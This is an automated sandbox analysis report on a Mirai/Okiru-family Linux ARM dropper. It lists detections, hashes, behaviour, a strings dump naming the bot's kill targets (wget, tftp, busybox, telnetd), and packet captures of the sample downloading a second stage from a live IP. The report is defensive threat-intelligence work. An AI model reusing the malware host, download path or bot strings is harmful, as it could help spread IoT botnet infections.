Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.arm6.elf

Overview

General Information

Sample name:dlr.arm6.elf
Analysis ID:1542861
MD5:b0fb587ae4404c9fd86eda2985d1a15b
SHA1:c32b89a1e2f4b741ba9c4cbd903faf5e2270a5f1
SHA256:994c64af68157c42c80142c4f12381995986600031ddaa5f2b4a6858b9529171
Tags:elfuser-abuse_ch
Infos:

Detection

Okiru
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Okiru
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Reads system version information
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1542861
Start date and time:2024-10-26 19:20:10 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 24s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.arm6.elf
Detection:MAL
Classification:mal64.troj.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: dlr.arm6.elf
Command:/tmp/dlr.arm6.elf
PID:5705
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
byte
bro
Standard Error:
  • system is lnxubuntu20
  • dlr.arm6.elf (PID: 5705, Parent: 5511, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/dlr.arm6.elf
  • systemd New Fork (PID: 5744, Parent: 1)
  • snap-failure (PID: 5744, Parent: 1, MD5: 69136a7d575731ce62349f2e4d3e5c36) Arguments: /usr/lib/snapd/snap-failure snapd
    • systemctl (PID: 5759, Parent: 5744, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop snapd.socket
  • cleanup
SourceRuleDescriptionAuthorStrings
/tmp/byteJoeSecurity_OkiruYara detected OkiruJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: /tmp/byteAvira: detection malicious, Label: EXP/ELF.Mirai.Bootnet.o
    Source: dlr.arm6.elfReversingLabs: Detection: 47%
    Source: byte.12.drString: byte/proc/%d/net/tcp %*d: %*x:%x/proc//proc/%s/exe/proc/self/exe/proc/proc/%d/cmdlinenetstatwgettftpftpcurlbusybox/bin/busyboxvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/soraJoshohajime902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget-log1337SoraLOADERSAIAKINAggtq1378bfp919GRB1Q2SAIAKUSOggtr14FaSEXSLAVE1337ggtt1902a3u912u3u4haetrghbr19ju3dSORAojkf120hehahejeje922U2JDJA901F91SlaVLav12helpmedaddthhhhh2wgg9qphbqSlav3Th3seD3viceshzSmYZjYMQ5GbfSoRAxD123LOLiaGv5aA3SoRAxD420LOLinsomni640277SoraBeReppin1337ipcamCache66tlGg9QjUYfouyf876ke3TOKYO3lyEeaXul2dULCVxh93OfjHZ2zTY2gD6MZvKc7KU6rmMkiy6f87lA023UU4U24UIUTheWeekndmioribitchesA5p9TheWeekndsmnblkjpoiAbAdTokyosnebAkiruU8inTznetstatsAlexW9RCAKM20TnewnetwordAyo215WordnloadsBAdAsVWordmanenotyakuzaaBelchWordnetsobpBigN0gg0r420X0102I34fofhasfhiafhoiX19I239124UIUoismXSHJEHHEIIHWOolsVNwo12DeportedDeportedXkTer0GbA1onry0v03FortniteDownLOLZY0urM0mGaypussyfartlmaojkGrAcEnIgGeRaNnYvdGkqndCOqGeoRBe6BEGuiltyCrownZEuS69s4beBsEQhdHOHO-KSNDOZEuz69sat1234aj93hJ23scanHAalie293z0k2LscanJoshoARMHellInSideayyyGangShitscanJoshoARM5HighFryb1glscanJoshoARM6IWhPyucDbJboatnetzscanJoshoARM7IuYgujeIqnbtbatrtahzexsexscanJoshoM68KJJDUHEWBBBIBscanJoshoMIPSJSDGIEVIVAVIGcKbVkzGOPascanJoshoMPSLccADscanJoshoPPCKAZEN-OIU97chickenxingsscanJoshoSH4yakuskzm8KAZEN-PO78HcleanerscanJoshoSPCKAZEN-U79OLdbeefscanJoshoX86yakuz4c24KETASHI32ddrwelperscanarm5zPnr6HpQj2Kaishi-Iz90Ydeexecscanarm6zdrtfxcgyKatrina32doCP3fVjscanarm7zxcfhuioKsif91je39scanm68kKuasadvrhelperl33t_feetl33tl33tfeetscanmipsKuasaBinsMateeQnOhRk85rscanmpslLOLHHHOHOHBUIeXK20CL12ZnyamezyQBotBladeSPOOKYhikariwasherep4029x91xx32uhj4gbejhwizardzhra.outboatnetdbgcondiheroshimaskid.dbglzrdPownedSecurity69.aresfxlyazsxhyUNSTABLEunstable_is_the_story_of_the_universemoobotjnsd9sdoilayourmomgaeissdfjiougsiojOasisSEGRJIJHFVNHSNHEIHFOSapep999KOWAI-BAdAsVKOWAI-SADjHKipU7Ylairdropmalwareyour_verry_fucking_gayBig-Bro-Brightsefaexecshirololieagle.For-Gai-Mezy0x6axNLcloqkisvspookymythSwergjmioGKILLEJW(IU(JIWERGFJGJWJRGHetrhwewrtheIuFdKssCxzjSDFJIjioOnrYoXd666ewrtkjokethajbdf89wu823AAaasrdgsWsGA4@F6FGhostWuzHere666BOGOMIPSbeastmodedvrHelperbestmodesfc6aJfIuYDemon.xeno-is-godICY-P-0ODIJgSHUIHIfhwrgLhu87VhvQPzlunadakuexecbinTacoBellGodYololigangExecutionorbitclientAmnesi
    Source: global trafficHTTP traffic detected: GET /bins/byte.arm6 HTTP/1.0Data Raw: 00 00 Data Ascii:
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.20.69
    Source: global trafficHTTP traffic detected: GET /bins/byte.arm6 HTTP/1.0Data Raw: 00 00 Data Ascii:
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: classification engineClassification label: mal64.troj.linELF@0/1@0/0
    Source: /usr/lib/snapd/snap-failure (PID: 5759)Systemctl executable: /usr/bin/systemctl -> systemctl stop snapd.socketJump to behavior
    Source: /usr/lib/snapd/snap-failure (PID: 5744)Reads version info: /proc/versionJump to behavior
    Source: /tmp/dlr.arm6.elf (PID: 5705)File written: /tmp/byteJump to dropped file
    Source: /tmp/dlr.arm6.elf (PID: 5705)Queries kernel information via 'uname': Jump to behavior
    Source: dlr.arm6.elf, 5705.1.00007ffdf3dfc000.00007ffdf3e1d000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/dlr.arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.arm6.elf
    Source: dlr.arm6.elf, 5705.1.0000564dcd7df000.0000564dcd90d000.rw-.sdmpBinary or memory string: MV!/etc/qemu-binfmt/arm
    Source: dlr.arm6.elf, 5705.1.0000564dcd7df000.0000564dcd90d000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
    Source: dlr.arm6.elf, 5705.1.00007ffdf3dfc000.00007ffdf3e1d000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: /tmp/byte, type: DROPPED

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: /tmp/byte, type: DROPPED
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Systemd Service
    1
    Systemd Service
    Direct Volume AccessOS Credential Dumping11
    Security Software Discovery
    Remote ServicesData from Local System1
    Non-Application Layer Protocol
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Scripting
    Boot or Logon Initialization ScriptsRootkitLSASS Memory1
    System Information Discovery
    Remote Desktop ProtocolData from Removable Media1
    Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542861 Sample: dlr.arm6.elf Startdate: 26/10/2024 Architecture: LINUX Score: 64 18 154.216.20.69, 53682, 80 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 2->18 20 Antivirus detection for dropped file 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 Yara detected Okiru 2->24 7 dlr.arm6.elf 2->7         started        10 systemd snap-failure 2->10         started        signatures3 process4 file5 16 /tmp/byte, ELF 7->16 dropped 12 snap-failure systemctl 10->12         started        14 snap-failure 10->14         started        process6
    SourceDetectionScannerLabelLink
    dlr.arm6.elf47%ReversingLabsLinux.Backdoor.Mirai
    SourceDetectionScannerLabelLink
    /tmp/byte100%AviraEXP/ELF.Mirai.Bootnet.o
    /tmp/byte71%ReversingLabsLinux.Backdoor.Bushido
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    154.216.20.69
    unknownSeychelles
    135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    154.216.20.69dlr.x86.elfGet hashmaliciousOkiruBrowse
    • /bins/byte.x86
    dlr.mpsl.elfGet hashmaliciousOkiruBrowse
    • /bins/byte.mpsl
    dlr.mips.elfGet hashmaliciousOkiruBrowse
    • /bins/byte.mips
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    SKHT-ASShenzhenKatherineHengTechnologyInformationCoA0Cr6LQ52c.elfGet hashmaliciousMiraiBrowse
    • 154.216.19.13
    Y48ThN7tMs.elfGet hashmaliciousMiraiBrowse
    • 154.216.19.13
    nsLuqUOchO.elfGet hashmaliciousMiraiBrowse
    • 154.216.19.13
    pkKNSB7f9E.elfGet hashmaliciousMiraiBrowse
    • 154.216.19.13
    5q9dF23ShO.elfGet hashmaliciousMiraiBrowse
    • 154.216.19.13
    dlr.x86.elfGet hashmaliciousOkiruBrowse
    • 154.216.20.69
    boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
    • 154.216.19.13
    dlr.mpsl.elfGet hashmaliciousOkiruBrowse
    • 154.216.20.69
    dlr.mips.elfGet hashmaliciousOkiruBrowse
    • 154.216.20.69
    boatnet.mips.elfGet hashmaliciousMiraiBrowse
    • 154.216.19.13
    No context
    No context
    Process:/tmp/dlr.arm6.elf
    File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
    Category:dropped
    Size (bytes):88960
    Entropy (8bit):6.186570019866003
    Encrypted:false
    SSDEEP:1536:JznyZvn8aHS9qQmjEXlIFuOmE90avpLf3SMciGMyaW787RE5kYLl61d62:w/8cSqL6wqE90av0MyaW78FE2w4z
    MD5:A43E9FC94B44146457050C47E96A4818
    SHA1:DD40ABB18BDA7BA3BB222515AA06D7E29525548F
    SHA-256:DE137A2B6427DF64A6227B2E4AF5649E17F02AC4E5B873EEA574A6044AF8D18D
    SHA-512:C80BFA9D13E0EB3AE7A73890A474956CEC8F01DA5AF99095109BC2C5C6D1C99E8E89993151A6B71575EBBF28DE24FE3DA830B2055E7B972BC0DCB501EF584970
    Malicious:true
    Yara Hits:
    • Rule: JoeSecurity_Okiru, Description: Yara detected Okiru, Source: /tmp/byte, Author: Joe Security
    Antivirus:
    • Antivirus: Avira, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 71%
    Reputation:low
    Preview:.ELF..............(.....T...4....Y......4. ...(......................M...M...............M...M...M......<...........Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.,Y.......M....-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../......M..0Y...M.................. ... -...-.......-......0..4.. 1..............P..@-..@.......0....S.................0....S...............P..............@..../..@.......G-......`...p...... ...u ....p..0...0....P..P...P....U......G..../.j ....p..@........P..........1..$ ...... ......1......1..l0........Q.....`0... .......0....S..................0....S...........P.........1........... ..$0.........../.....HY..LY...O-...Q...M..@...P..........O..../.........!<.. 4...,...4....T.......... ....T.. ............Y......1...p...0D...S....:.........`..3............pg..............0G.. P..`F...V..0...@... ......0................V.>....P....U...G..`..0.................X..`..
    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
    Entropy (8bit):4.829300480136063
    TrID:
    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
    File name:dlr.arm6.elf
    File size:1'456 bytes
    MD5:b0fb587ae4404c9fd86eda2985d1a15b
    SHA1:c32b89a1e2f4b741ba9c4cbd903faf5e2270a5f1
    SHA256:994c64af68157c42c80142c4f12381995986600031ddaa5f2b4a6858b9529171
    SHA512:047943c531fc122f7808bd196ba41ac4c61a9ed6bd2fa7f144db55b08012d35d3b03d88e1234fd5a409e70d5dc03203687dfe9422bb414137ccc1c5b810b9ca0
    SSDEEP:24:lpKGpa7Urz/jlfoZMAXK1hH9Vev3gRGaJ9iM3BBuDCWlxrR+zP6eF0:lpKGpa7UrLZo0I+JhBumWlxrsPLF
    TLSH:5E311191A3D05EBCCCE491BEEE5643507374AF44E0C772639608B768FE2AE7C9D26046
    File Content Preview:.ELF..............(.........4...........4. ...(.....................H...H...............H...H...H...................Q.td.........................................8...<...4...........(.."...#...../...-.......M.................../...-.......M................

    ELF header

    Class:ELF32
    Data:2's complement, little endian
    Version:1 (current)
    Machine:ARM
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x838c
    Flags:0x4000002
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:3
    Section Header Offset:1176
    Section Header Size:40
    Number of Section Headers:7
    Header String Table Index:6
    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
    NULL0x00x00x00x00x0000
    .textPROGBITS0x80a00xa00x35c0x00x6AX0016
    .rodataPROGBITS0x83fc0x3fc0x4c0x10x32AMS004
    .gotPROGBITS0x104480x4480xc0x40x3WA004
    .bssNOBITS0x104540x4540x80x00x3WA004
    .ARM.attributesARM_ATTRIBUTES0x00x4540x100x00x0001
    .shstrtabSTRTAB0x00x4640x330x00x0001
    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
    LOAD0x00x80000x80000x4480x4485.26830x5R E0x8000.text .rodata
    LOAD0x4480x104480x104480xc0x140.00000x6RW 0x8000.got .bss
    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
    TimestampSource PortDest PortSource IPDest IP
    Oct 26, 2024 19:21:48.707607985 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:48.713068962 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:48.713125944 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:48.713943958 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:48.719321012 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.581918955 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.581934929 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.581954002 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.581965923 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.581979990 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.582057953 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.582057953 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.582057953 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.582098007 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.582098007 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.582128048 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.582142115 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.582154036 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.582165003 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.582175970 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.582175970 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.582216978 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.582228899 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.582250118 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.582251072 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.587624073 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.587642908 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.587665081 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.587665081 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829565048 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829585075 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829596043 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829607010 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829632044 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829632044 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829632044 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829632044 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829653025 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829663992 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829675913 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829679012 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829687119 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829689026 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829700947 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829708099 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829765081 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829777002 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829787970 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829797983 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829804897 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829804897 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829804897 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829812050 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829818964 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829833984 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829916000 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829926968 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829937935 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829948902 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829950094 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829950094 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.829960108 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829972982 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.829976082 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.830060959 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.830071926 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.830090046 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.830100060 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.830312967 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.835305929 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.835351944 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.836308002 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.867969990 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.868056059 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.868067980 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.868078947 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.868091106 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.868426085 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.868438005 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.868448973 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.868498087 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.868514061 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.869342089 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.869440079 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.869456053 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.869462967 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.869468927 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.869599104 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.870260954 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.870282888 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.870296001 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.870466948 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.870480061 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.871200085 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.871211052 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.871222019 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.871324062 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.871335983 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.871809006 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.874999046 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.875010967 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.875022888 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.875032902 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.876147985 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:49.877289057 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.877434015 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:49.878828049 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:50.078144073 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:50.083735943 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:50.083756924 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:50.083868980 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:50.083888054 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:50.083899975 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:50.083916903 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:50.083936930 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:50.084017038 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:50.084043026 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:50.084064960 CEST8053682154.216.20.69192.168.2.13
    Oct 26, 2024 19:21:50.084189892 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:52.039228916 CEST5368280192.168.2.13154.216.20.69
    Oct 26, 2024 19:21:52.044748068 CEST8053682154.216.20.69192.168.2.13
    Session IDSource IPSource PortDestination IPDestination Port
    0192.168.2.1353682154.216.20.6980
    TimestampBytes transferredDirectionData
    Oct 26, 2024 19:21:48.713943958 CEST46OUTGET /bins/byte.arm6 HTTP/1.0
    Data Raw: 00 00
    Data Ascii:
    Oct 26, 2024 19:21:49.581918955 CEST1236INHTTP/1.1 200 OK
